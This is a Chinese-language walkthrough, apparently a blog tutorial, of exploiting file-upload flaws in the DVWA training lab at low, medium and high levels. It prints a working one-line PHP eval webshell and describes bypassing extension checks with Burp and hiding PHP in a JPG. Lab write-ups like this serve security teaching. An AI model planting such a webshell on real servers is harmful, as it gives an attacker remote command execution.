DVWA文件上传
文件上传漏洞,通常是由于对上传文件的mame类型、没有进行严格的过滤、检查,使得攻击者可以通过上传木马,获取服务器的webshell权限,件上传漏洞带来的危害常常是毁灭性的
文件上传漏洞的利用是有限制条件的,首先当然是要能够成功上传木马文件,其次上传文件必须能够被执行,最后就是上传文件的路径必须可知的。
我们测试的靶场是dvwa,至于怎么搭建可以自行百度。
工具:burp,一句话,靶场环境,蚁剑
LOW级别漏洞利用
1.创建一个txt文件将<?php @eval($_REQUEST["mima"])?>复制到里面去,然后将后缀名改成php。
2.打开靶场,选择文件
3.点击uplaod上传,
上传成功,http://192.168.80.132/dvwa/hackable/uploads/1.php
密码是:mima
4.打开蚁剑,选择添加数据,复制粘贴以上内容,链接类型选择php
密面是mima
点击添加,添加完成双击访问网站目录、。
Medium级别
1,首先我们将我们之前的一句话木马文件后缀名改成png图片类型,然后选择。3,打开浏览器设置代理,然后确定保存
4,这个时候打开burp,打开抓包。然后点击图1的uplaod进上传,这个时候我们的burp会拦截数据包,我们将图下画圈位置的地方的那个文件后缀名改成php,然后点击forward转发
ok
这个时候我们已经可以看到已经上传成功了。我们继low级别链接蚁剑的操作,继续操作就可以链接了!==
high级别
1.首先准备一个jpg图片和一个php文件,放在同一个目录下,然后使用copy工具将两个文件捆绑在一起。
_
2.然后打开010查看是否捆绑成功+
可以看出已经捆绑成功了
3.然后打开靶场进行上传。
ok已經上传成功了